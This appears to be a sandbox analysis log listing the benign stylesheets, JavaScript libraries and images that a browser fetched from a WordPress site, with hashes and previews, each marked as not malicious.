                                                            SHA-512:BD9FD7BAA59B909D8757B71F5364A9979BA76B9D930A86CE92AB617EFDB16BC053306012B51D8F9D9B199AFEDD0838109763C877466B3EDE6DCF3CD558A8BD00
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://canpol.poznan.pl/wp-content/themes/salient/style.css?ver=7.6
                                                            Preview:/*..Theme Name: Salient..Theme URI: http://www.themenectar.com..Author: ThemeNectar..Author URI: http://themenectar.com..Description: An Ultra Responsive Multi-Purpose Theme...Version: 7.6..License: GNU General Public License version 3.0..License URI: http://www.gnu.org/licenses/gpl-3.0.html..-------------------------------------------------------------------------...1..Browser Reset + Font Face..2..Globally Applied Styles..3..Header + Search Bar Styles..4..Plugin Related Styles..5..Page + Custom Page Layout Styles..6..Nectar Shortcode Styles..7. Footer Styles..8..Sidebar Styles..9. Blog + Pagination Styles..10..Comment Styles..11..General Form Styles..-------------------------------------------------------------------------*/.../*-------------------------------------------------------------------------*/./*.1..Browser Reset + Font Face./*-------------------------------------------------------------------------*/.html, body, div, span, applet, object, iframe, table, caption, tbody, t
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (32031)
                                                            Category:dropped
                                                            Size (bytes):54806
                                                            Entropy (8bit):5.223037954122912
                                                            Encrypted:false
                                                            SSDEEP:1536:NAybbO4IUdEvPgqIFxIFkUd3CcgY4PFGvDLVFuoE6:NAyTIPIFxIFVd3CcgY20DLyoE6
                                                            MD5:519F4CA109977EB54A1EC1922E6AFE3D
                                                            SHA1:CC430A9F6A96459FD13969C0CB1D1C1EE2A9298B
                                                            SHA-256:DC7F11BD907E7CC1D37D664B6CD24553B4CE493AB24DFC028ADAEA3A4D6AA6CA
                                                            SHA-512:8761B125650149AC3404EBFE0BE31DE2A1569E009FE7E90F035C4897F794EA56605AF2B802CF0EAA6672643E5DD9353A7B5B537069F1EC0E00CBD2F76BE50DA1
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:/*!. * Isotope PACKAGED v2.2.2. *. * Licensed GPLv3 for open source use. * or Isotope Commercial License for commercial use. *. * http://isotope.metafizzy.co. * Copyright 2015 Metafizzy. */..!function(a){function b(){}function c(a){function c(b){b.prototype.option||(b.prototype.option=function(b){a.isPlainObject(b)&&(this.options=a.extend(!0,this.options,b))})}function e(b,c){a.fn[b]=function(e){if("string"==typeof e){for(var g=d.call(arguments,1),h=0,i=this.length;i>h;h++){var j=this[h],k=a.data(j,b);if(k)if(a.isFunction(k[e])&&"_"!==e.charAt(0)){var l=k[e].apply(k,g);if(void 0!==l)return l}else f("no such method '"+e+"' for "+b+" instance");else f("cannot call methods on "+b+" prior to initialization; attempted to call '"+e+"'")}return this}return this.each(function(){var d=a.data(this,b);d?(d.option(e),d._init()):(d=new c(this,e),a.data(this,b,d))})}}if(a){var f="undefined"==typeof console?b:function(a){console.error(a)};return a.bridget=function(a,b){c(b),e(a,b)},a.bridget}}var d=A
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (65266)
                                                            Category:downloaded
                                                            Size (bytes):157610
                                                            Entropy (8bit):5.284064711550095
                                                            Encrypted:false
                                                            SSDEEP:3072:cWEI8UMz/tGzT3+XtHi2iX6APMupdRL21YOWy0AcDHzEJLDnWTnWNBEBysX6hMT0:deSRLQQqf
                                                            MD5:6DE31D697A1B1B2B0E2A3B29B1FB458B
                                                            SHA1:C9B6C996A66918F7C4D49C9B60134CE282C47143
                                                            SHA-256:443BA0AF7A7ED827223C7FB3C008C02B9FF1D651B6492E9C270378B07D9F6008
                                                            SHA-512:320C73680EC192AEE0D8D0FFE17620A3151B7A1B87AF743F6D3B869F8949902C5FC471245F3475065D2FC82A0784A94C944D99685CA6B09AD114B880C503A93E
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://canpol.poznan.pl/wp-includes/js/mediaelement/mediaelement-and-player.min.js?ver=4.2.16
                                                            Preview:/*!. * MediaElement.js. * http://www.mediaelementjs.com/. *. * Wrapper that mimics native HTML5 MediaElement (audio and video). * using a variety of technologies (pure JavaScript, Flash, iframe). *. * Copyright 2010-2017, John Dyer (http://j.hn/). * License: MIT. *. */.!function r(a,s,l){function d(n,e){if(!s[n]){if(!a[n]){var t="function"==typeof require&&require;if(!e&&t)return t(n,!0);if(u)return u(n,!0);var o=new Error("Cannot find module '"+n+"'");throw o.code="MODULE_NOT_FOUND",o}var i=s[n]={exports:{}};a[n][0].call(i.exports,function(e){var t=a[n][1][e];return d(t||e)},i,i.exports,r,a,s,l)}return s[n].exports}for(var u="function"==typeof require&&require,e=0;e<l.length;e++)d(l[e]);return d}({1:[function(e,t,n){},{}],2:[function(i,r,e){(function(e){var t,n=void 0!==e?e:"undefined"!=typeof window?window:{},o=i(1);"undefined"!=typeof document?t=document:(t=n["__GLOBAL_DOCUMENT_CACHE@4"])||(t=n["__GLOBAL_DOCUMENT_CACHE@4"]=o),r.exports=t}).call(this,"undefined"!=typeof global?global
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 90", baseline, precision 8, 1000x1000, components 3
                                                            Category:dropped
                                                            Size (bytes):208207
                                                            Entropy (8bit):7.974937773670412
                                                            Encrypted:false
                                                            SSDEEP:6144:JfGKhELev0MPHprhHK7FFlTJMLQwzrbWf7:JfphOa0MRtqFlTWL9zrqf7
                                                            MD5:6ABF5BD6E19B9535E6AE019D1B0775B9
                                                            SHA1:A7A94974549D8CC96E2681FFE50293F8A86EA015
                                                            SHA-256:E649F98035D3B521EE9669F952BF164AC059FB6A20B7CEAF62ED01B13A783420
                                                            SHA-512:4FF07F2CDF8C360C35A800B04C1AEE9D7002800143F39AAF6DE4E821E666BB738EEC48E0018C9000445E99E027E48508FA1A285141EE86572D376C6156C9094B
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 90....C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...?...Q.b.....MkX^>...2.,..U.?7....l|Ye..m^;..C.0\..[Q.....y.a..6..3..J.....I.e{......q..*..5m..E...s..q2oX...GN..b..?..r.v...p.....K).E...[R.........x.J....il#2..m&..K..*..x.M*.lR....g.....o..6!c.*.x.)..q....j.%...."^A ..P.M.k.~..yp.7.<.NU-.>Q.j.|g"C.V6......b}H..G.Jh.w...mu>.....+.G.5K...;d...W(.V.R..}a
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (11126)
                                                            Category:downloaded
                                                            Size (bytes):11224
                                                            Entropy (8bit):5.2603128465032745
                                                            Encrypted:false
                                                            SSDEEP:192:JrprDNvD66fPP/+I6OP1fQP0OIr96DB6MHXcwr1RF:JrprxG6fPP3P1fQMOIsDsMMS
                                                            MD5:79B4956B7EC478EC10244B5E2D33AC7D
                                                            SHA1:A46025B9D05E3DF30D610A8AEF14F392C7058DC9
                                                            SHA-256:029E0A2E809FD6B5DBE76ABE8B7A74936BE306C9A8C27C814C4D44AA54623300
                                                            SHA-512:217F86FEE871FA36ECA4F25830E3917C7BF57A681140B135C508AA32F2A1E3EFF5A80661F3B5BA46747D0C305AF10B658D207F449550F3D417D9683216FEEA8F
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://canpol.poznan.pl/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2
                                                            Preview:/*! jQuery Migrate v3.3.2 | (c) OpenJS Foundation and other contributors | jquery.org/license */."undefined"==typeof jQuery.migrateMute&&(jQuery.migrateMute=!0),function(t){"use strict";"function"==typeof define&&define.amd?define(["jquery"],function(e){return t(e,window)}):"object"==typeof module&&module.exports?module.exports=t(require("jquery"),window):t(jQuery,window)}(function(s,n){"use strict";function e(e){return 0<=function(e,t){for(var r=/^(\d+)\.(\d+)\.(\d+)/,n=r.exec(e)||[],o=r.exec(t)||[],i=1;i<=3;i++){if(+o[i]<+n[i])return 1;if(+n[i]<+o[i])return-1}return 0}(s.fn.jquery,e)}s.migrateVersion="3.3.2",n.console&&n.console.log&&(s&&e("3.0.0")||n.console.log("JQMIGRATE: jQuery 3.0.0+ REQUIRED"),s.migrateWarnings&&n.console.log("JQMIGRATE: Migrate plugin loaded multiple times"),n.console.log("JQMIGRATE: Migrate is installed"+(s.migrateMute?"":" with logging active")+", version "+s.migrateVersion));var r={};function u(e){var t=n.console;s.migrateDeduplicateWarnings&&r[e]||(r[e]=!0
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 210x210, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0 CE, datetime=2018:07:26 14:06:35], baseline, precision 8, 366x359, components 3
                                                            Category:downloaded
                                                            Size (bytes):139098
                                                            Entropy (8bit):7.902722970024383
                                                            Encrypted:false
                                                            SSDEEP:3072:qtTZtTaKleJoo7OSnWzuy5fkxeNK2jeBIFGB8iy8:qtTZtT5UaSAuoMFBIgB8/8
                                                            MD5:A1C8E9EF799386ECF3F9E1875B4F79F5
                                                            SHA1:252E22369F2D5E3B8E1E8AC9DD954CC7D60BAFEA
                                                            SHA-256:A07ABDB03AA46D904ED46DEBEC76D1F8069CF0C52F451102E3239CB7EAC8C254
                                                            SHA-512:6488C66583E22BE1087AE05071560DD8A05C5642EF67E066CBD4F9DF30FBB0E6D5C85F909E1C280CC78C09B9CD075B5B115BA55F8A95322B831C7FFAD89E3ED2
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://canpol.poznan.pl/wp-content/uploads/2018/10/klejone.jpg
                                                            Preview:......JFIF.............\Exif..MM.*.............................b...........j.(...........1.........r.2...........i..............................Adobe Photoshop 7.0 CE.2018:07:26 14:06:35.............................n...........g...........................................".(.....................*...........*.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d.................................................................................................................................................~...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?...:...BGO# .d.F..."#O...3 .4...../>~=..[.k......5....q..M....%+]c^uH.u.x.).?...-4....6.Q.?.....?........(....`q.^\.....*
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (1222)
                                                            Category:downloaded
                                                            Size (bytes):1257
                                                            Entropy (8bit):5.043558411227901
                                                            Encrypted:false
                                                            SSDEEP:24:Q775J7w/Wbiz7vBmGa1RIYTu9cwMY3l0SSCzfIZ7kJ7UBmGH7vKdpx3:Q7z1euMY69cQiSd07kJkidpp
                                                            MD5:E904F89B2191B14EEEB44A9C419E8676
                                                            SHA1:B125EB8E81AB1502F980EE6AE76DFC8CD5C9D6B4
                                                            SHA-256:E127AEAD57CD6625F795F8C41D8B7C463C2C50158E3A3DC398424DB2B16BD5DB
                                                            SHA-512:993A889AB299C8E0E846BCFB690813E1A1DD4453E218D7239DBC1C680DFCC40E687D6E1C27CF8C437E3752961F93777C1B36BFD23531E9CFC808FC7335893805
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://canpol.poznan.pl/wp-includes/js/dist/dom-ready.min.js?ver=71883072590656bf22c74c7b887df3dd
                                                            Preview:/*! This file is auto-generated */.this.wp=this.wp||{},this.wp.domReady=function(e){var t={};function n(r){if(t[r])return t[r].exports;var o=t[r]={i:r,l:!1,exports:{}};return e[r].call(o.exports,o,o.exports,n),o.l=!0,o.exports}return n.m=e,n.c=t,n.d=function(e,t,r){n.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:r})},n.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},n.t=function(e,t){if(1&t&&(e=n(e)),8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var r=Object.create(null);if(n.r(r),Object.defineProperty(r,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var o in e)n.d(r,o,function(t){return e[t]}.bind(null,o));return r},n.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return n.d(t,"a",t),t},n.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},n.p="",n(n.s="2oG7")}({"2oG7
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:HTML document, ASCII text, with very long lines (14649)
                                                            Category:dropped
                                                            Size (bytes):17230
                                                            Entropy (8bit):5.424048318777379
                                                            Encrypted:false
                                                            SSDEEP:384:GEsMgHW5MpTcaGd+lhomA581KQoZRY5y6pHh1puOYFd:G3MEhh/AmKr25y6pHa
                                                            MD5:ACD0ACD6836185B288CCB9F5E023ED70
                                                            SHA1:24A72AF088BA056AC9A89E3E94D28807E1A6C5CB
                                                            SHA-256:D0623A42EDAFCA4A9BF949AEB498DBFBE09342F0D4D08A319A2B6E18C929EE10
                                                            SHA-512:7608813DDF1AE58EE1023EC55DF1715AD65110C7D15910391D36C844DD322FC1475456C8A6E49E3E69194F37977304887EF7C11E428FBCFC659A2756B3D85BB8
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:/* Modernizr 2.8.3 (Custom Build) | MIT & BSD. * Build: http://modernizr.com/download/#-fontface-backgroundsize-borderimage-borderradius-boxshadow-flexbox-flexboxlegacy-hsla-multiplebgs-opacity-rgba-textshadow-cssanimations-csscolumns-generatedcontent-cssgradients-cssreflections-csstransforms-csstransforms3d-csstransitions-applicationcache-canvas-canvastext-draganddrop-hashchange-history-audio-video-indexeddb-input-inputtypes-localstorage-postmessage-sessionstorage-websockets-websqldatabase-webworkers-geolocation-inlinesvg-smil-svg-svgclippaths-touch-webgl-shiv-cssclasses-prefixed-teststyles-testprop-testallprops-hasevent-prefixes-domprefixes-load. */.;window.Modernizr=function(a,b,c){function C(a){j.cssText=a}function D(a,b){return C(n.join(a+";")+(b||""))}function E(a,b){return typeof a===b}function F(a,b){return!!~(""+a).indexOf(b)}function G(a,b){for(var d in a){var e=a[d];if(!F(e,"-")&&j[e]!==c)return b=="pfx"?e:!0}return!1}function H(a,b,d){for(var e in a){var f=b[a[e]];if(f!==c)
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (8354)
                                                            Category:downloaded
                                                            Size (bytes):8539
                                                            Entropy (8bit):5.051633363365418
                                                            Encrypted:false
                                                            SSDEEP:192:WzLY1jWBoYf0/AgJbgmAGCkHYp5odNd882EeANEjCWe7:WzLSWBoYfqAgJLrHe5odNd882EeANEjK
                                                            MD5:4B16E073282E3D8BBE1093B7CDAAEA84
                                                            SHA1:15BC43DF0109106319412A19D535478234E12ED6
                                                            SHA-256:69FC7BCAFEE09477B13DBDA32D00410BC15A3FAEB3E890CC15FEF46D7C84D432
                                                            SHA-512:E159061E064257C9A9EEABEF77EEB9AA98E5ABA6FB4AA2981F4D22D3EE5E46EB3DBF15A3659CC103B3E446991FA7DDAC8ED24E0D10DEF3030C5C72C4CA6199E7
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://canpol.poznan.pl/wp-includes/js/jquery/ui/autocomplete.min.js?ver=1.12.1
                                                            Preview:/*!. * jQuery UI Autocomplete 1.12.1. * http://jqueryui.com. *. * Copyright jQuery Foundation and other contributors. * Released under the MIT license.. * http://jquery.org/license. */.!function(e){"function"==typeof define&&define.amd?define(["jquery","./menu","./core"],e):e(jQuery)}(function(o){return o.widget("ui.autocomplete",{version:"1.12.1",defaultElement:"<input>",options:{appendTo:null,autoFocus:!1,delay:300,minLength:1,position:{my:"left top",at:"left bottom",collision:"none"},source:null,change:null,close:null,focus:null,open:null,response:null,search:null,select:null},requestIndex:0,pending:0,_create:function(){var i,s,n,e=this.element[0].nodeName.toLowerCase(),t="textarea"===e,e="input"===e;this.isMultiLine=t||!e&&this._isContentEditable(this.element),this.valueMethod=this.element[t||e?"val":"text"],this.isNewMenu=!0,this._addClass("ui-autocomplete-input"),this.element.attr("autocomplete","off"),this._on(this.element,{keydown:function(e){if(this.element.prop("readOnly"))s=
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (23966)
                                                            Category:dropped
                                                            Size (bytes):24138
                                                            Entropy (8bit):5.096569708153791
                                                            Encrypted:false
                                                            SSDEEP:384:Ar7mIr/Dh5rA3rzB4rMhr/XWGHW/6rMz1xftF2OUVP4eAnbhfreD6dCBEOav7blM:+SxxGG2/71xftFqVP4eAnI0ROavPSCzo
                                                            MD5:3B3FC826E58FC554108E4A651C9C7848
                                                            SHA1:76778FD446E2FF2377588A7B4AC4D79F258427C9
                                                            SHA-256:E00ADD38134EAC2FB8E8E9C09CBFFF7BBE57952B210322EB2EECB0A21FC055EB
                                                            SHA-512:AE192D8D804F7DAFD8B7A95220CEB66C0C308A51CDF42C172C20F71F50052E4529B01F8781C5F305E1E0D6C5367D9678F1D908EE4273DB594FBB650C56A9F61B
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:/*! This file is auto-generated */./*!. * Masonry PACKAGED v4.2.2. * Cascading grid layout library. * https://masonry.desandro.com. * MIT License. * by David DeSandro. */..!function(t,e){"function"==typeof define&&define.amd?define("jquery-bridget/jquery-bridget",["jquery"],function(i){return e(t,i)}):"object"==typeof module&&module.exports?module.exports=e(t,require("jquery")):t.jQueryBridget=e(t,t.jQuery)}(window,function(t,e){"use strict";function i(i,r,a){function h(t,e,n){var o,r="$()."+i+'("'+e+'")';return t.each(function(t,h){var u=a.data(h,i);if(!u)return void s(i+" not initialized. Cannot call methods, i.e. "+r);var d=u[e];if(!d||"_"==e.charAt(0))return void s(r+" is not a valid method");var l=d.apply(u,n);o=void 0===o?l:o}),void 0!==o?o:t}function u(t,e){t.each(function(t,n){var o=a.data(n,i);o?(o.option(e),o._init()):(o=new r(n,e),a.data(n,i,o))})}a=a||e||t.jQuery,a&&(r.prototype.option||(r.prototype.option=function(t){a.isPlainObject(t)&&(this.options=a.extend(!0,this.optio
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:PNG image data, 300 x 225, 8-bit/color RGBA, non-interlaced
                                                            Category:downloaded
                                                            Size (bytes):13043
                                                            Entropy (8bit):7.947984043566014
                                                            Encrypted:false
                                                            SSDEEP:384:I3EZ3czxjOIFZIjmaJzQUhuWzDTQehNYnJ:8EBYjOIF2jmVUhuWXdhenJ
                                                            MD5:F372013D40E14C34651A3EF3B7F235D7
                                                            SHA1:E95D5FA6C2DC2F5EBC5C1CD56AA706695B7A908B
                                                            SHA-256:B4C2EFAA5C9A6C5738258D56803C95228670504FC371CF5AF7AD863B2124AC5C
                                                            SHA-512:15F81AB68B3E355E1AE0B8B791A5D0E4A3897D2594D7652F74ED766A141F28FAEE2BE3FF57AB35738046D1B3C651BDE8ACC5D21EA1EFD0171F1300F57348DD80
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://canpol.poznan.pl/wp-content/uploads/2015/07/disney_zootropolis.png
                                                            Preview:.PNG........IHDR...,.........r|......bKGD..............pHYs...#...#.x.?v....tIME.....6"7Rh... .IDATx..g...u....7..h4.nD.D`...$..HJ.H.4.-[...y#.....7.........F.dE.J.DQ.I1...).@#.#...}.p..qo....L.[....o...O.:.. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .g...\X.1N.Z....;....z....(%.y..n..b6.}......d./.R.DF..F..[,..pbb.....l.l6K&...}<. .....z.N.T.X,R,.iiiy.....l...R.DI............$..ZZZhoo.......fnn.R.TY.b.....~K.%.z.}.r../...g..lkOO.dQo..kll.b.8.z..?N...-.... ..........+V.L&%(o"..*###8........ITDX.EQ)....;w>.t.............:4.e..Z...2....kEVv.Z..].v....S.U....].*.7n..d2...T,Q.a..T*..w..o...*.h. `.].E.]..R..?..DX.j.......?}.&DV....s.U....kl..).....V..g.....s.tZ."..r.....[.n]..*HD..KBp.J...?...#..NI:....'.....1&!..a]HY9SSS..........(zzz.......d.q$""..%.....?.r.J..pZ.\.......1&/..a].Y.CCC.....RP8....-;88.W..W"".:.h.........+.....^..:.^.u.DC.u^.....?.........}.|
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:PNG image data, 300 x 225, 8-bit/color RGBA, interlaced
                                                            Category:downloaded
                                                            Size (bytes):14209
                                                            Entropy (8bit):7.970436096228198
                                                            Encrypted:false
                                                            SSDEEP:384:IBo5BugzWDMKMXThVGSnH2SLbLHbTpAdKUiq1dmTmikhfuL8C9:co5BugqAXTDGg9LvGLx1dmPefuL8C9
                                                            MD5:67B4A7C6A491A7CB3B2B9543D3469745
                                                            SHA1:7415BB6D79B4B523A8A0BA1A50FA40BBADB91E6E
                                                            SHA-256:0487E66B4495D3B6F11DDB483968D8841B1EE914E3959BBA1286D7A1E99E687B
                                                            SHA-512:E6076F190C7E1E5695D8B1760F5E41CF2539AB778A88DE9926C0EB82499597D18D62DA1341A10D04D873BCCD256ACC177DEC4038D113A0EC59E2AECB7BBD4F28
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://canpol.poznan.pl/wp-content/uploads/2015/07/makro_glowna_thumb.png
                                                            Preview:.PNG........IHDR...,..........{.=....pHYs...#...#.x.?v.. .IDATx...|.e....%}..$....D...X.^..b.S....o........vz..NO.8."..PT.......}...wf7Y.n...fg...|&...3...7...I.e..S...........{....te}R.3j...A)e ....\.n.O.&L...|..X]].@.....N...p.AY..{..h....;....?zVP....Q.....O.....w.{.}..\.o...].e.^..h\..s1..-Y.D..|.}....1.>..).,.n.Q.`..v....l..{...0..80....@4PX..)..p..X.l....AeC.........a.y...h..~...r.f..b.R..............s.u.......p.5....5..t{`..aE ......1z...GD.\..p.....7..((.........F..~..g..;6$.,n........:....H.D...$..._...3b..Z..p`..`...'>>.D...H.a....50..E..u2(o.x.>4..>...u>.C0#..u>.....K....G...b.-.#G.L.d^M.'..G..J...........UXX(...+1)P@...PP...].F+......PP...:.C.....P.5..._......NYj.......\.-R.....E0b$.....2....4Rvw..|...%..zf...N_.,*.8_i.}...x...a8....].1..0......r:.._D.k.....!....x.d... >\.../...b..X4;4Ay#jB...|. %S.L...3[.....no......$..6l..'.:..........{../.Xu.5..'(7.EEEM......Z.X.z.2...%....d.9...........Y.f....5%!A...........m.......
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (21403)
                                                            Category:dropped
                                                            Size (bytes):23625
                                                            Entropy (8bit):6.06683888807607
                                                            Encrypted:false
                                                            SSDEEP:384:87P7ie8trA99GHCtWfIYrOTXLEJGUMXpAaHaGV8PU+L5zLqbw2baeHJFVCVHvVP/:87P8trlHZ1YKGpXpAaHr8PLL5zLaw2F4
                                                            MD5:A6A1545DC2D59AAEE3D3BF0D905C586B
                                                            SHA1:37986F49F05C9FF734493320FF4DFFCE5970DBFA
                                                            SHA-256:9D29B72C598627A233C17C02F8D064F73984A22F3FCE2E47ABC90DD1A5662CEA
                                                            SHA-512:85309BDACAC76E90F7ECE6F28271AF97E88F1C59582D6D6AD86D0FCBCF6ED1EB6CEF9FE2661FE63BB7EFDFD96A8DEBE102D081183AD1B7BE6E276401E7E1E65F
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:/*!. --------------------------------. Infinite Scroll. --------------------------------. + https://github.com/paulirish/infinite-scroll. + version 2.1.0. + Copyright 2011/12 Paul Irish & Luke Shumard. + Licensed under the MIT license.. + Documentation: http://infinite-scroll.com/.*/.;(function(e){if(typeof define==="function"&&define.amd){define(["jquery"],e)}else{e(jQuery)}})(function(e,t){"use strict";e.infinitescroll=function(n,r,i){this.element=e(i);if(!this._create(n,r)){this.failed=true}};e.infinitescroll.defaults={loading:{finished:t,finishedMsg:"<em>Congratulations, you've reached the end of the internet.</em>",img:"data:image/gif;base64,R0lGODlh3AATAPQeAPDy+MnQ6LW/4N3h8MzT6rjC4sTM5r/I5NHX7N7j8c7U6tvg8OLl8uXo9Ojr9b3G5MfP6Ovu9tPZ7PT1+vX2+tbb7vf4+8/W69jd7rC73vn5/O/x+K243ai02////wAAACH/C05FVFNDQVBFMi4wAwEAAAAh+QQECgD/ACwAAAAA3AATAAAF/6AnjmRpnmiqrmzrvnAsz3Rt33iu73zv/8CgcEj0BAScpHLJbDqf0Kh0Sq1ar9isdioItAKGw+MAKYMFhbF63CW438f0mg1R2O8EuXj/aOPtaHx7fn96goR4hmuId4qDdX95c
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (6694)
                                                            Category:dropped
                                                            Size (bytes):31125
                                                            Entropy (8bit):5.026093168401823
                                                            Encrypted:false
                                                            SSDEEP:384:Y9lleYtgOH1lJ1rRZ56d4+Sg74Xwi+R5qhCOYFd:WDH7JhUNV8wi+7
                                                            MD5:4DB1AABE45C049DF4D33098CA0943EDD
                                                            SHA1:9AA48588B0F835B3421D1AFC9BC1B753121A5AA1
                                                            SHA-256:3D891A2A9BEAC7CD76F04B72710D9B640B9DA9CF5215A0C5DB94363C0B218585
                                                            SHA-512:287423EF0DC2523558DAEAEEA28F138CFFBA1D677AAFC4E9E68605B9B80BA0181030B58E0998CD84E5FF6F9A628BD25955D1A7522F36EA5B772FEFC862B96F78
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview://midnight init .../*!. * Midnight.js 1.1.0. * jQuery plugin to switch between multiple fixed header designs on the fly, so it looks in line with the content below it.. * http://aerolab.github.io/midnight.js/. *. * Copyright (c) 2014 Aerolab <info@aerolab.co>. *. * Released under the MIT license. * http://aerolab.github.io/midnight.js/LICENSE.txt. */. // jQuery Widget.(function(e){"function"==typeof define&&define.amd?define(["jquery"],e):e(jQuery)})(function(e){var t=0,i=Array.prototype.slice;e.cleanData=function(t){return function(i){var s,n,a;for(a=0;null!=(n=i[a]);a++)try{s=e._data(n,"events"),s&&s.remove&&e(n).triggerHandler("remove")}catch(o){}t(i)}}(e.cleanData),e.widget=function(t,i,s){var n,a,o,r,h={},l=t.split(".")[0];return t=t.split(".")[1],n=l+"-"+t,s||(s=i,i=e.Widget),e.expr[":"][n.toLowerCase()]=function(t){return!!e.data(t,n)},e[l]=e[l]||{},a=e[l][t],o=e[l][t]=function(e,t){return this._createWidget?(arguments.length&&this._createWidget(e,t),void 0):new o(e,t)},e.extend
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:PNG image data, 300 x 225, 8-bit/color RGBA, non-interlaced
                                                            Category:dropped
                                                            Size (bytes):16961
                                                            Entropy (8bit):7.973661003786498
                                                            Encrypted:false
                                                            SSDEEP:384:I2KnFnDP4llxpDZfMf0GJEgZjuIeSWMIUW8kNYO72RL9mxx:g1opDdMfd6gZjDeSo3KO8mX
                                                            MD5:4729A7AFCFE8A46646BBC2BF637D45FB
                                                            SHA1:16F11697A1163AC2030F89CB45EAF5F45D648B6F
                                                            SHA-256:5F3E0E50DF88579102F735609E1AD6F5141295B17D8D64404E31D9864262D023
                                                            SHA-512:7A1B6086DD698983B6A8B33153FB8A58A85BFAD9F9B15DF0F00DAB024CBBFD391DBE7E2313676C8C5D222186BE7AA44845721ECC1BBDEE54DCE434AA2FC52505
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:.PNG........IHDR...,.........r|......gAMA....|.Q.... cHRM...........R...@..}y.....<.....s<.w.../iCCPICC Profile..H..wTT....wz..0..z..0... ..Q.f......Ml..@D...E......H..b!(.`.H.Pb0...dF.J|yy.......g.s..{....$O../... .'..z8.W.G....x....0Y.A..@$/7.z........H..e..O...O.T...._..lN:K.."N.....3"..$..F../JP.rb.[.}..Q..d.[..S..l1..x{..#b.G...\N..o.X3I....[ql2.....$..8.x.......t..r.p../8...p...C...f.q....K.njm.{r2.8...?......).L^6..g.,.qm."[.Z[Z....~Q....7%.."....3......R..`.j...[.~.:.. w....!.$E}k...yh.y...Rm..333..........:..}.=#.v.....e...tq.X)I)B>==......<..8..X....9<QD.h..8Q.yl....sy....0.OZ.k.(...5..H....>.....yP..........:.8......p.........Lg....k.k...$.......t.!0.V..8.7....`.........2A....@.....JP..A#h.'@.8.....:....`....`......a!2D..!UH.2.. .d..A>P ..ECq...B.....*.*.Z....:.]..B..=h...~....L...2...........5p.......N..........:|......@...QC.....!.H,.G6 .H9R.. ]H/r..A..w(......Q.(OT...JCm@..*QGQ...-.(j...MF+...6h/.*t.:.]..G7....w...7......Xa<1...:L1....s.
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 90", baseline, precision 8, 500x500, components 3
                                                            Category:dropped
                                                            Size (bytes):73410
                                                            Entropy (8bit):7.96566142460689
                                                            Encrypted:false
                                                            SSDEEP:1536:bAk1YQkKVgODoiBcsOMYqrNweNaOlUEB1p5S3jK:ck0WdDbB4u2QflUEB3
